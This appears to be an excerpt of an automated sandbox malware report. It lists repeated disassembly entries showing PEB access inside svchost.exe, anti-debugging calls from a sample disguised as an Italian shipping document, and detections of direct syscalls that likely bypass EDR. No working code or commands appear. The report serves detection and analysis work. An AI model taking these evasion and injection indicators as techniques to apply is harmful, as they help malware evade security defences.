            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]1_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]1_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]1_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]1_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]1_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h]1_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]1_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]1_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]1_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]1_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]1_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]1_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]1_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]1_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]1_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]1_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]1_2_02FBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov edx, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0946 mov eax, dword ptr fs:[00000030h]1_2_02FB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB892A mov eax, dword ptr fs:[00000030h]1_2_02FB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC892B mov eax, dword ptr fs:[00000030h]1_2_02FC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC912 mov eax, dword ptr fs:[00000030h]1_2_02FBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28918 mov eax, dword ptr fs:[00000030h]1_2_02F28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28918 mov eax, dword ptr fs:[00000030h]1_2_02F28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE908 mov eax, dword ptr fs:[00000030h]1_2_02FAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE908 mov eax, dword ptr fs:[00000030h]1_2_02FAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68EF5 mov eax, dword ptr fs:[00000030h]1_2_02F68EF5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE6ED0 mov ecx, dword ptr fs:[00000030h]1_2_02FE6ED0
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
